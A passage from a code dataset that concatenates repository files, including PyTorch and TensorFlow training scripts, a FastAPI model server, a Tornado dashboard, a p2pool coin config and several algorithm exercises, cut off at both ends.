splash:runjs('document.getElementsByName(\"url\")[0].value=\"{url}\";document.getElementsByTagName(\"form\")[0].submit();')\n assert(splash:wait(3)) \n local title = splash:evaljs('document.getElementsByClassName(\"videotikmate-middle center\")[0].children[1].innerText') \n return {{\n html = splash:html(),\n title = title\n }}\n end\n \"\"\"\n })\n\n self.notifier.make_progress_bar(30)\n html = response.json().get(\"html\")\n if not html: \n continue \n\n matches_id = re.search(r' Video:\n return TiktokEngine().proceed(url, notifier, session)\n\n\n","repo_name":"Soebb/videofetcher","sub_path":"videofetcher/bot/engines/1_wowm_tiktok_engine.py","file_name":"1_wowm_tiktok_engine.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71243861334","text":"import cv2\nimport torchvision\nimport numpy as np\nimport torch\nimport os\nimport json\nimport random\nfrom torchvision import transforms\nimport moviepy.editor as mp\nfrom PIL import Image\n\n# This Dataset can return either rgb frames or optical flow\nclass YT8M_Single_Modality(torch.utils.data.Dataset):\n def __init__(self, root, clip_length, transform, modality='rgb', temp_aug=True):\n self.root = root\n self.clip_length = clip_length\n self.transform = transform\n self.buffer = 2048\n self.clips = []\n self.temp_aug = temp_aug\n f = open(\"durations.json\",\"r\")\n self.durations = json.load(f)\n f.close()\n for k, v in self.durations.items():\n for i in range(v//(self.clip_length+self.buffer)):\n self.clips.append((k, i*(self.clip_length+self.buffer)))\n random.seed(42)\n random.shuffle(self.clips)\n \n def __len__(self):\n return len(self.clips)\n\n def __getitem__(self, index):\n vid, start = self.clips[index]\n rgb = np.load(self.root+vid+'.npz')[modality]\n start1 = start\n start2 = start\n if self.temp_aug:\n start1 = start1 + np.random.choice(range(self.clip_length))\n start2 = start2 + np.random.choice(range(self.clip_length))\n end1 = start1 + self.clip_length\n end2 = start2 + self.clip_length\n seq_idx = np.concatenate([np.arange(start1,end1), np.arange(start2,end2)])\n seq_rgb = [Image.fromarray(rgb[i,:,:,:].squeeze()) for i in seq_idx]\n return torch.stack(self.transform(seq_rgb), 1)\n \nclass YT8M_RGB_Flow(torch.utils.data.Dataset):\n def __init__(self, root_rgb, root_flow, clip_length, transform, temp_aug=True):\n self.root_rgb = root_rgb\n self.root_flow = root_flow\n self.clip_length = clip_length\n self.transform = transform\n self.temp_sampling = 128\n self.buffer = 2048\n self.clips = []\n self.temp_aug = temp_aug\n f = open(\"durations.json\",\"r\")\n self.durations = json.load(f)\n f.close()\n instance_number = 0\n for k, v in self.durations.items():\n for i in range(v//(self.clip_length+self.buffer)):\n self.clips.append((k, i*(self.clip_length+self.buffer), instance_number))\n instance_number = instance_number + 1\n random.seed(42)\n random.shuffle(self.clips)\n\n def __len__(self):\n return len(self.clips)\n \n def frame_sampler(self, start, rgb, flow):\n total_time = rgb.shape[0]\n start1 = start\n start2 = start\n if self.temp_aug:\n start1 = start1 + np.random.choice(range(self.clip_length))\n start2 = start2 + np.random.choice(range(self.clip_length))\n end1 = start1 + self.clip_length\n end2 = start2 + self.clip_length\n seq_idx = np.concatenate([np.arange(start1,end1), np.arange(start2,end2)])\n seq_rgb = [Image.fromarray(rgb[i,:,:,:].squeeze()) for i in seq_idx] # create a list of images for preprocessing\n seq_flow = [Image.fromarray(flow[i,:,:,:].squeeze()) for i in seq_idx]\n return seq_rgb, seq_flow\n \n def __getitem__(self, index):\n vid, l, instance_id = self.clips[index]\n arr = np.load(self.root_rgb+vid+'.npz')\n rgb = arr['rgb']\n flow = arr['flow']\n seq_rgb, seq_flow = self.frame_sampler(l,rgb,flow)\n transform = self.transform\n seq = transform(seq_rgb[0:self.clip_length] + seq_flow[0:self.clip_length] \\\n + seq_rgb[self.clip_length::] + seq_flow[self.clip_length::])\n seq1 = seq[0:self.clip_length*2] # rgb, flow\n seq2 = seq[self.clip_length*2::] # rgb, flow\n seq1 = torch.stack(seq1, 1)\n seq2 = torch.stack(seq2, 1)\n return (seq1, seq2), instance_id","repo_name":"anup-h/meta-clr","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42924571105","text":"# import sys\n# input = sys.stdin.readline\n\n# n,m = map(int,input().split())\n# data = []\n# for _ in range(n):\n# \trow = list(map(int,input().split()))\t\t\n# \tfor _ in range(row[2]):\n# \t\tdata.append((row[0],row[1]))\n\n\n# temp = [[] for _ in range(m+1)]\n\n# def solution():\n# \tdp = [0] * (m+1)\n\n# \tfor i,item in enumerate(data):\n# \t\tc,s = item[0],item[1]\n# \t\tfor j in range(c,m+1):\n\n# \t\t\torigin = dp[j] \n# \t\t\tsum = dp[j-c] + s\n\n# \t\t\tif (c,i) not in temp[c]:\n# \t\t\t\tif origin >= sum:\n# \t\t\t\t\tdp[j] = origin\t\t\t\t\t\n# \t\t\t\telse:\n# \t\t\t\t\tdp[j] = sum\t\t\t\t\n# \t\t\t\t\ttemp[j] = temp[j-c]\n# \t\t\t\t\ttemp[j].append((c,i))\n\n# \t\tprint(temp)\n\n# \tprint(dp)\n\n\n# solution()\n\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\n\ndp = [0 for _ in range(M+1)]\nweight, satisfaction = [], []\nfor _ in range(N):\n V, C, K = map(int, input().split())\n\n idx = 1\n while K > 0:\n tmp = min(idx, K)\n\n weight.append(V * tmp)\n satisfaction.append(C * tmp)\n\n idx *= 2\n K -= tmp\n\nprint(weight)\nprint(satisfaction)\n# for i in range(len(weight)):\n# for j in range(M, 0, -1):\n# if j >= weight[i]:\n# dp[j] = max(dp[j], dp[j-weight[i]] + satisfaction[i])\n\nfor i,w in enumerate(weight):\n\tfor j in range(M,w-1,-1):\t\t\n\t\tdp[j] = max(dp[j], dp[j-weight[i]] + satisfaction[i])\n\nprint(dp[M])","repo_name":"Junnjjj/Algorithm","sub_path":"Sample_Question/DP/12920.py","file_name":"12920.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24243761122","text":"from ecomm.model.base_model import BaseModel\n\n\nclass User(BaseModel):\n\n def __init__(self, **kwargs):\n self.customer_id = kwargs.get('customer_id')\n self.name = kwargs.get('name')\n self.email = kwargs.get('email')\n self.address = kwargs.get('address')\n self.table = \"User\"\n self.meta = ('customer_id', 'name', 'email', 'address')\n print(kwargs)\n super().__init__()\n\n\nuser1 = User(customer_id = 2222323, name = 'kdhushsdsal', email='khushalt5@gmail.com', address= 'Pune')\nuser1.on_delete()","repo_name":"khushalt/ecommerce_cli","sub_path":"model/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"18643810717","text":"import os\nimport platform\n\nfrom twisted.internet import defer\n\nfrom .. import data, helper\nfrom p2pool.util import pack\n\nP2P_PREFIX = '04040404'.decode('hex') #messagestart\nP2P_PORT = 19967\nADDRESS_VERSION = 55 #pubkey_address\nRPC_PORT = 26667\nRPC_CHECK = defer.inlineCallbacks(lambda bitcoind: defer.returnValue(\n 'pwnycoinaddress' in (yield bitcoind.rpc_help()) and\n not (yield bitcoind.rpc_getinfo())['testnet']\n ))\nSUBSIDY_FUNC = lambda height: 6144*100000000 if height<8640 else 2048*100000000 >> (height * 1)//172800\nPOW_FUNC = data.hash256\nBLOCK_PERIOD = 30 # s\nSYMBOL = 'PWNY'\nCONF_FILE_FUNC = lambda: os.path.join(os.path.join(os.environ['APPDATA'], 'pwnycoin') if platform.system() == 'Windows' else os.path.expanduser('~/Library/Application Support/pwnycoin/') if platform.system() == 'Darwin' else os.path.expanduser('~/.pwnycoin'), 'pwnycoin.conf')\nBLOCK_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nADDRESS_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nTX_EXPLORER_URL_PREFIX = 'http://www.pwnycoin.com/?'\nSANE_TARGET_RANGE = (2**256//2**32//1000 - 1, 2**256//2**32 - 1)\nDUMB_SCRYPT_DIFF = 1\nDUST_THRESHOLD = 1e8\n","repo_name":"amarian12/p2pool-adaptive","sub_path":"p2pool/bitcoin/networks/pwnycoin.py","file_name":"pwnycoin.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"26097079656","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\n\nhealth = pd.read_csv('strokecsv/healthcare-dataset-stroke-data.csv')\nle = LabelEncoder()\nhealth[health.select_dtypes(include=['object']).columns] = health[health.select_dtypes(include=['object']).columns].apply(le.fit_transform)\nhealth.head()\n\nprint(health.head())\nhealth = np.array(health)\n\nX = np.array(health[:,1:11])\nY = np.array(health[:,11])\nprint(X)\nmodel = Sequential()\nmodel.add(Dense(24, input_dim=10, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# 모델 컴파일\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['accuracy'])\n\n# 모델 실행\nmodel.fit(X, Y, epochs=200, batch_size=500)\n\nprint()\nprint(model.predict(np.array([0.0, 90.0, 0.0, 0.0, 0.0, 0.0, 0.0, 200.0, 40.0, 0.0]).reshape(1,10)))\n","repo_name":"jeajin/Machine_Learning","sub_path":"Simulator/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25990472268","text":"\"\"\"\nthreading模块创建线程\n直接从threading.Thread继承创建一个新的子类,并实例化猴调用start()方法启动新线程,即它调用了线程的run()方法\n\"\"\"\n\nimport threading\nimport time\n\nexitFlag = 0\n\n# 括号里是继承一个类,\nclass myThread(threading.Thread):\n def __init__(self, thread_id, name, counter):\n # 子类继承父类的__init__方法,两种写法都可以\n # threading.Thread.__init__(self)\n super(myThread, self).__init__()\n self.thread_id = thread_id\n self.name = name\n self.counter = counter\n\n def run(self):\n print(\"开始线程:\", self.name)\n print_time(self.name, self.counter, 5)\n print(\"退出线程:\", self.name)\n\ndef print_time(thread_name, delay, counter):\n while counter:\n if exitFlag:\n thread_name.exit()\n time.sleep(delay)\n print(\"{0}:{1}\".format(thread_name, time.ctime(time.time())))\n counter -= 1\n\n# 创建新线程\nthread1 = myThread(1, 'thread_1', 1)\nthread2 = myThread(2, 'thread_2', 2)\n\n# 开启新线程\nthread1.start()\nthread2.start()\nprint('当前线程变量:', threading.currentThread())\nprint('正在运行的线程list:', threading.enumerate())\nprint('正在运行的线程数量:', threading.activeCount())\nprint(\"线程名称:\", thread1.getName())\nprint(\"是否还在活动\", thread1.is_alive())\nthread1.join()\nthread2.join()\n\nprint(\"退出主线程\")","repo_name":"shangxinzb/python_study","sub_path":"basics/threading/theading.py","file_name":"theading.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"46591119107","text":"from __future__ import print_function\nimport logging\nimport time\nfrom gsmmodem.modem import GsmModem\nfrom Gsm.Test.handle_sms import handleSms\n\nLAST_TIME = time.time()\n#It is different between computers\nPORT = \"COM7\"\nBAUDRATE = 115200\n# SIM card PIN (if any)\nPIN = None\n\ndef test():\n print(\"test....\")\n\n# initializing modem\ndef main():\n\n print('Initializing modem...')\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)\n modem = GsmModem(PORT, BAUDRATE, smsReceivedCallbackFunc=handleSms)\n modem.smsTextMode = False\n modem.connect(PIN)\n print('Waiting for SMS message...')\n try:\n test()\n modem.rxThread.join(2 ** 20)\n finally:\n print(\"Trying from inside while loop\")\n modem.close()\n\nif __name__ == '__main__':\n\n while True:\n try:\n main()\n except:\n time.sleep(2)\n print(\"Trying one more time\")\n continue\n","repo_name":"MohammadMahdiOmid/GSM-Modem","sub_path":"Gsm/Test/recieve_sms.py","file_name":"recieve_sms.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23353946854","text":"import os, glob, re, sys, argparse, time, random\r\nfrom random import shuffle\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom nf_UTILS import *\r\nfrom nf_MODEL import model\r\n#from tensorflow.contrib.slim.nets import resnet_v1\r\n#import tensorflow.contrib.slim as slim\r\n\r\ntf.logging.set_verbosity(tf.logging.WARN)\r\n\r\nEXP_DATA = '20190601-av1-2k-sepGrad-small'\r\nTRAIN_DATA_PATH = \"/home/chenjs/nf/data/train/small_low\"\r\nTRAIN_LABEL_PATH = \"/home/chenjs/nf/data/train/small_high\"\r\nVALID_DATA_PATH = \"/home/chenjs/ee-new/data/test/18/av1_18_qp53\"\r\nVALID_LABEL_PATH = \"/home/chenjs/ee-new/data/test/18/gt\"\r\n#VALID_DATA_PATH = ''\r\n#VALID_LABEL_PATH = ''\r\nLOG_PATH = \"./logs/%s/\"%(EXP_DATA)\r\nCKPT_PATH = \"./checkpoints/%s/\"%(EXP_DATA)\r\nDEVIDE_SIZE = 0\r\nPATCH_SIZE = (64,64)\r\nBATCH_SIZE = 64\r\nBASE_LR = 0.0001\r\nLR_DECAY_RATE = 0.5\r\nLR_DECAY_STEP = 50\r\nMAX_EPOCH = 600\r\nIMAGE_BATCH = 4\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--model_path\")\r\nargs = parser.parse_args()\r\nmodel_path = args.model_path\r\n\r\n'''\r\nph : Place Holder\r\nso : Sess Output\r\n\r\n'''\r\nif __name__ == '__main__':\r\n\r\n #===================prepare data==================#\r\n #The following variables contain the whole training/validation set.\r\n #They contain a large number of [imagedate, label]\r\n train_data = get_train_pair(TRAIN_DATA_PATH, TRAIN_LABEL_PATH)\r\n #train_data = get_train_list(load_file_list(TRAIN_DATA_PATH), load_file_list(TRAIN_LABEL_PATH))\r\n\r\n len_train_data = len(train_data)\r\n #print(\"num of train data:%d\"%(len_train_data))\r\n stepsPerEpoch = len_train_data // BATCH_SIZE\r\n\r\n if (VALID_LABEL_PATH and VALID_DATA_PATH):\r\n valid_data = get_train_pair(VALID_DATA_PATH, VALID_LABEL_PATH)\r\n phValInput = tf.placeholder('float32', shape=(1, None, None, 1))\r\n phValGt = tf.placeholder('float32', shape=(1, None, None, 1))\r\n\r\n valOutput = tf.multiply(tf.clip_by_value(model(phValInput), 0., 1.), 255)\r\n\r\n\r\n #==================define model==================#\r\n with tf.name_scope('input_scope'):\r\n phTrainInput = tf.placeholder('float32', shape=(BATCH_SIZE, PATCH_SIZE[0], PATCH_SIZE[1], 1))\r\n phTrainGt = tf.placeholder('float32', shape=(BATCH_SIZE, PATCH_SIZE[0], PATCH_SIZE[1], 1))\r\n\r\n trainOutput = tf.multiply(tf.clip_by_value(model(phTrainInput), 0., 1.), 255)\r\n\r\n with tf.name_scope('loss_scope'):\r\n\r\n loss = tf.reduce_mean(tf.square(tf.subtract(trainOutput, phTrainGt)))\r\n #loss = tf.reduce_sum(tf.square(tf.subtract(trainOutput, phTrainGt)))\r\n weights = tf.get_collection(tf.GraphKeys.WEIGHTS)\r\n loss += tf.add_n(weights) * 1e-4\r\n\r\n avg_loss = tf.placeholder('float32')\r\n tf.summary.scalar(\"avg_loss\", avg_loss)\r\n\r\n\r\n with tf.name_scope('optimization'):\r\n global_step = tf.Variable(0, trainable=False)\r\n learning_rate = tf.train.exponential_decay(BASE_LR, global_step, LR_DECAY_STEP*stepsPerEpoch, LR_DECAY_RATE, staircase=True)\r\n tf.summary.scalar(\"learning rate\", learning_rate)\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate, 0.9)\r\n opt = optimizer.minimize(loss, global_step=global_step)\r\n\r\n saver = tf.train.Saver(max_to_keep=0)\r\n\r\n config = tf.ConfigProto(allow_soft_placement=True)\r\n config.gpu_options.allow_growth = True\r\n\r\n #========================start training==================#\r\n with tf.Session(config=config) as sess:\r\n\r\n makeDirsIfNotExist(LOG_PATH)\r\n makeDirsIfNotExist(CKPT_PATH)\r\n\r\n\r\n merged = tf.summary.merge_all()\r\n file_writer = tf.summary.FileWriter(LOG_PATH, sess.graph)\r\n\r\n sess.run(tf.global_variables_initializer())\r\n\r\n if model_path:\r\n print(\"restore model...\")\r\n saver.restore(sess, model_path)\r\n print(\"Done\")\r\n\r\n for epoch in range(MAX_EPOCH):\r\n shuffle(train_data)\r\n total_g_loss, n_iter = 0, 0\r\n\r\n start_time = time.time()\r\n\r\n for idx in range(stepsPerEpoch):\r\n input_data, gt_data = get_batch_data(train_data, BATCH_SIZE, idx)\r\n #input_data, gt_data, cbcr_data = prepare_nn_data(train_data, idx)\r\n feed_dict = {phTrainInput: input_data, phTrainGt: gt_data}\r\n _, soLoss, soTrainOutput, g_step= sess.run([opt, loss, trainOutput, global_step], feed_dict=feed_dict)\r\n\r\n total_g_loss += soLoss\r\n n_iter += 1\r\n\r\n lr, summary = sess.run([learning_rate, merged], {avg_loss:total_g_loss/n_iter})\r\n file_writer.add_summary(summary, epoch)\r\n\r\n epoch_time = time.time() - start_time\r\n avgLoss = total_g_loss/n_iter\r\n tf.logging.warning(\"Epoch: [%4d/%4d] time: %4.4f\\tloss: %.8f\\tlr: %.8f\"%(epoch, MAX_EPOCH, epoch_time, avgLoss, lr))\r\n\r\n #There is no need to save ckpt for every epoch; besides it costs much space.\r\n if ((epoch+1) % 10 == 0):\r\n saver.save(sess, os.path.join(CKPT_PATH, \"%s_%03d.ckpt\"%(EXP_DATA, epoch)))\r\n\r\n #=======validation========#\r\n #It ought to be a geninue validation set, but here directly uses test set for the sack of convience, because this test set is relatively small.\r\n if (VALID_LABEL_PATH and VALID_DATA_PATH):\r\n sumPsnr = 0\r\n numValidData = len(valid_data)\r\n for i in range(numValidData):\r\n valid_input = np.reshape(valid_data[i][0], (1, valid_data[i][0].shape[0], valid_data[i][0].shape[1], valid_data[i][0].shape[2]))\r\n soValidOutput = sess.run(valOutput, feed_dict={phValInput:valid_input})\r\n sumPsnr += psnr(valid_data[i][1], soValidOutput)\r\n avgPsnr = sumPsnr / numValidData\r\n tf.logging.warning(\"Epoch: %d, avgPsnrOnValid: %.4f\"%(epoch, avgPsnr))\r\n\r\n","repo_name":"linyiduo123/AV1_small_model","sub_path":"nf_UNK.py","file_name":"nf_UNK.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"24342306578","text":"'''\nDesign a logger system that receive stream of messages along with its timestamps, each message should be printed if and only if it is not printed in the last 10 seconds.\n\nGiven a message and a timestamp (in seconds granularity), return true if the message should be printed in the given timestamp, otherwise returns false.\n\nIt is possible that several messages arrive roughly at the same time.\n\nExample:\n\nLogger logger = new Logger();\n\n// logging string \"foo\" at timestamp 1\nlogger.shouldPrintMessage(1, \"foo\"); returns true; \n\n// logging string \"bar\" at timestamp 2\nlogger.shouldPrintMessage(2,\"bar\"); returns true;\n\n// logging string \"foo\" at timestamp 3\nlogger.shouldPrintMessage(3,\"foo\"); returns false;\n\n// logging string \"bar\" at timestamp 8\nlogger.shouldPrintMessage(8,\"bar\"); returns false;\n\n// logging string \"foo\" at timestamp 10\nlogger.shouldPrintMessage(10,\"foo\"); returns false;\n\n// logging string \"foo\" at timestamp 11\nlogger.shouldPrintMessage(11,\"foo\"); returns true;\n\n'''\n\n'''\nThe idea is that we keep a hashtable/dictionary with the message as key, \nand its timestamp as the value. \nThe hashtable keeps all the unique messages along with the latest timestamp that the message was printed.\n\nAlgorithm\n\nWe initialize a hashtable/dictionary to keep the messages along with the timestamp.\n\nAt the arrival of a new message, the message is eligible to be printed with either of the two conditions as follows:\n\ncase 1). we have never seen the message before.\n\ncase 2). we have seen the message before, and it was printed more than 10 seconds ago.\n\nIn both of the above cases, we would then update the entry that is associated with the message in the hashtable, with the latest timestamp.\n\n\n'''\nclass Logger(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._msg_dict = {}\n \n def shouldPrintMessage(self, timestamp, message):\n \"\"\"\n Returns true if the message should be printed in the given timestamp, otherwise returns false.\n \"\"\"\n if message not in self._msg_dict:\n # case 1). add the message to print\n self._msg_dict[message] = timestamp\n return True\n\n if timestamp - self._msg_dict[message] >= 10:\n # case 2). update the timestamp of the message\n self._msg_dict[message] = timestamp\n return True\n else:\n return False\n","repo_name":"pnkumar9/PythonScripts","sub_path":"Easy-100/Logger-Rate-Limiter.py","file_name":"Logger-Rate-Limiter.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15891268078","text":"inp = \"abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(\"\r\nout = \"agmsy4!&bfhlnrtxz359@^*ceikoquw0268#%(djpv17$\"\r\n\r\ncipher=\"Yl 410b8ofasa503ea70f6au gi2cef36d5492r 3d74b\"\r\n\r\na=[]\r\nb=[]\r\nc=[]\r\n\r\nfor i in inp:\r\n a.append(i)\r\n\r\nfor j in out:\r\n b.append(j)\r\n\r\nfor i in a:\r\n for j in range(0,len(b)):\r\n if i == b[j]:\r\n c.append(j)\r\n\r\nprint(c)\r\noutput=[]\r\n\r\nfor i in range(0,len(cipher)):\r\n output.append('')\r\n\r\nj=0\r\nret=''\r\nfor i in c:\r\n output[j]=cipher[i]\r\n j = j+1\r\n\r\nfor i in output:\r\n ret=ret+i\r\nprint(ret)\r\n","repo_name":"dracoranger/random-items","sub_path":"descrambler.py","file_name":"descrambler.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1045260303","text":"from pydantic.types import Json\r\nimport uvicorn \r\nfrom fastapi import FastAPI\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom typing import List\r\nimport numpy as np \r\nimport joblib \r\nfrom pydantic import BaseModel \r\n\r\n\r\n\r\n#load model\r\n\r\napp = FastAPI()\r\n\r\nmodel = joblib.load(\"myModel.sav\")\r\n\r\n@app.get('/')\r\ndef index():\r\n return {\"API\" : \"Ready to call\"}\r\n\r\nclass OutData(BaseModel):\r\n pred : float\r\n\r\nclass DataType(BaseModel):\r\n product : str\r\n calories : float \r\n carbs : float \r\n time : str \r\n dish : str \r\n heat : str \r\n fat : float \r\n no_ingredients : int \r\n proteins : float \r\n protein_class : str \r\n cuisine : str \r\n\r\n@app.post('/predict', response_model=OutData)\r\ndef prediction(data : DataType):\r\n data = data.dict() \r\n prd = data.get(\"product\")\r\n cal = data.get(\"calories\")\r\n carb = data.get(\"carbs\")\r\n time = data.get(\"time\")\r\n dsh = data.get(\"dish\")\r\n heat = data.get(\"heat\")\r\n fat = data.get(\"fat\")\r\n ingrd = data.get(\"no_ingredients\")\r\n prot = data.get(\"proteins\")\r\n pro_clss = data.get(\"protein_class\")\r\n cuisine = data.get(\"cuisine\")\r\n answer = model.predict([prd, cal, carb, time, dsh, heat, fat, ingrd, prot, pro_clss, cuisine])\r\n answer = np.exp(answer)\r\n answer = OutData(pred = answer)\r\n answer = jsonable_encoder(answer)\r\n \r\n return answer\r\n \r\n '''\r\n if answer:\r\n return {\"statusCode\": 200,\r\n \"body\": {\"Expected sales\": answer}}\r\n else:\r\n return {\"status\": 404,\r\n \"body\": {\"Message\": \"Are you sure you're using the right data ?\"}}\r\n \r\n\r\n if answer < 1000:\r\n return {f\"Sales is low with value{answer}. Ensure to increase your input\"}\r\n\r\n else:\r\n return {f\"Sales is high with value {answer}. You can still increase your input\"}\r\n\r\n'''\r\nif __name__ == \"__main__\":\r\n uvicorn.run(app, host='127.0.0.1', port=8000)\r\n","repo_name":"Khamaldeeen/intertrack-fastapi-grp8","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30242211087","text":"class Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n # BFS\n rows,cols = len(matrix),len(matrix[0])\n deltas = [(1,0),(-1,0),(0,1),(0,-1)] # 4 adjacent directions we can move in\n \n queue = deque() \n max_dist = max(rows,cols)\n \n for r in range(rows):\n for c in range(cols):\n if matrix[r][c]==1:\n matrix[r][c] = max_dist\n else:\n queue.append((r,c))\n \n while queue:\n r,c = queue.popleft()\n \n for dr,dc in deltas:\n row,col = r+dr,c+dc \n if (0<=(row) cls.cache_size:\n cls.cache = cls.cache[-cls.cache_size:]\n\n @classmethod\n def send_updates(cls, msg):\n print(\"sending message to waiters\", len(cls.waiters))\n # logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(msg)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_message(self, message):\n # logging.info(\"got message %r\", message)\n print(\"got message \", message)\n # self.write(\"
current_nodeid: %s
\" % message)\n VisualizeDataHandler.send_updates(message)\n\n# def boot():\n# # os.system(\"curl 127.0.0.1:8000/new_node?n=9\")\n# http_client = tornado.httpclient.AsyncHTTPClient()\n# http_client.fetch(\"http://127.0.0.1:8000/new_node?n=9\", method=\"GET\")\n\ndef main():\n global dashboard_host\n global dashboard_port\n\n parser = argparse.ArgumentParser(description=\"control description\")\n parser.add_argument('--dashboard_host', default=\"127.0.0.1\")\n parser.add_argument('--dashboard_port', default=setting.DASHBOARD_PORT)\n\n args = parser.parse_args()\n dashboard_host = args.dashboard_host\n dashboard_port = args.dashboard_port\n\n server = Application()\n server.listen(dashboard_port)\n # tornado.ioloop.IOLoop.instance().call_later(2, boot)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"EcoPoW/BitPoW","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":18190,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"36152461202","text":"import multiprocessing\nimport random\n\nfrom matplotlib import animation\n\nimport config\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.utils as vutils\nfrom data_loader import dataloader\nfrom discriminator import Discriminator\nfrom generator import Generator\nfrom torch import nn, optim\nfrom utils import weights_init\n\n\ndef main():\n # Set reproducability\n manualSeed = 123\n print(\"Random seed:\", manualSeed)\n random.seed(manualSeed)\n torch.manual_seed(manualSeed)\n\n device = torch.device(\n \"cuda:0\" if (torch.cuda.is_available() and config.NGPU > 0) else \"cpu\"\n )\n print(\"Device:\", device)\n\n # Plot some training images\n # real_batch = next(iter(dataloader))\n # plt.figure(figsize=(8, 8))\n # plt.axis(\"off\")\n # plt.title(\"Training Images\")\n # plt.imshow(\n # np.transpose(\n # vutils.make_grid(\n # real_batch[0].to(device)[:64], padding=2, normalize=True\n # ).cpu(),\n # (1, 2, 0),\n # )\n # )\n\n netG = Generator(config.NGPU).to(device)\n\n # Multi GPU\n if (device.type == \"cuda\") and (config.NGPU > 1):\n netG = torch.nn.DataParallel(netG, list(range(config.NGPU)))\n\n # Set initial weights\n netG.apply(weights_init)\n\n # print(netG)\n\n netD = Discriminator(config.NGPU).to(device)\n\n # Multi GPU\n if (device.type == \"cuda\") and (config.NGPU > 1):\n netD = torch.nn.DataParallel(netD, list(range(config.NGPU)))\n\n # Set initial weights\n netD.apply(weights_init)\n\n # print(netD)\n\n criterion = nn.BCELoss()\n\n fixed_noise = torch.randn(64, config.NZ, 1, 1, device=device)\n\n real_label = 1\n fake_label = 0\n\n optimizerD = optim.Adam(\n netD.parameters(), lr=config.LR, betas=(config.BETA1, 0.999)\n )\n optimizerG = optim.Adam(\n netG.parameters(), lr=config.LR, betas=(config.BETA1, 0.999)\n )\n\n img_list = []\n G_losses = []\n D_losses = []\n iters = 0\n\n print(\"Starting Training Loop...\")\n\n for epoch in range(config.EPOCHS):\n for i, data in enumerate(dataloader, 0):\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ## All real batch\n netD.zero_grad()\n real_cpu = data[0].to(device)\n b_size = real_cpu.size(0)\n label = torch.full((b_size,), real_label, dtype=torch.float, device=device)\n output = netD(real_cpu).view(-1)\n errD_real = criterion(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n ## All fake batch\n noise = torch.randn(b_size, config.NZ, 1, 1, device=device)\n fake = netG(noise)\n label.fill_(fake_label)\n output = netD(fake.detach()).view(-1)\n errD_fake = criterion(output, label)\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n optimizerD.step()\n\n # (2) Update G network: maximize log(D(G(z)))\n netG.zero_grad()\n label.fill_(real_label)\n output = netD(fake).view(-1)\n errG = criterion(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print(\n \"[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f\"\n % (\n epoch,\n config.EPOCHS,\n i,\n len(dataloader),\n errD.item(),\n errG.item(),\n D_x,\n D_G_z1,\n D_G_z2,\n )\n )\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or (\n (epoch == config.EPOCHS - 1) and (i == len(dataloader) - 1)\n 